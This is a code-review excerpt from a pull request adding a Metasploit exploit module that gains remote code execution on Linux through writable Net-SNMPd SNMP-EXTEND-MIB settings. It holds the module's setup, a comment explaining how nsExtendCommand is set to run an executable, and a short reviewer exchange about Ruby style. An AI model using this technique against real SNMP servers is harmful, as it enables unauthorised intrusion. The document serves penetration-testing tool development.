modules/exploits/linux/snmp/net_snmpd_rw_access.rb

```diff
@@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'snmp'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::SNMPClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution',
+        'Description'    => %q(
+            This exploit module exploits the SNMP write access configuration ability of SNMP-EXTEND-MIB to
+ configure MIB extensions and lead to remote code execution.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => ['Steve Embling at InteliSecure'],
+        'References'     =>
+          [
+            [ 'URL', 'https://www.intelisecure.com']
+          ],
+        'Payload'        =>
+          {
+            'Space'    => 4096 #arbitrary, but it seems to max out the size
+            #'BadChars' => "\x00"
+          },
+        'Targets'        =>
+        [
+          ['Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' }],
+          #Not tested on other platforms but confirmed the above works.
+        ],
+        #'DisclosureDate' => "Dec 22 2017",
+        'DefaultTarget'  => 0,
+      )
+    )
+    register_options(
+      [
+        OptString.new('FILEPATH', [true, 'file path to write to ', '/tmp']),
+        OptString.new('CHUNKSIZE', [true, 'Maximum bytes of payload to write at once ', 200])
+      ])
+  end
+
+  def check
+    Exploit::CheckCode::Unsupported
+  end
+
+  #
+  # The exploit method connects and sets:
+  # NET-SNMP-EXTEND-MIB::nsExtendStatus."tmp" = INTEGER: createAndGo(4)
+  # NET-SNMP-EXTEND-MIB::nsExtendCommand."tmp" = STRING: /path/to/executable
+  # NET-SNMP-EXTEND-MIB::nsExtendArgs."tmp" = STRING: arguments
+  #
+  def exploit
+    @payload_name = "#{rand_text_alpha(5)}"
```

Comment:
Is there a reason you're using a `@` class variable here? This seems unnecessary as `exploit` is the only method.

Reply:
No reason, I don't know ruby at all (this is my first look at it - so I almost certainly lifted this from some documentation or another module - will get this changed thanks.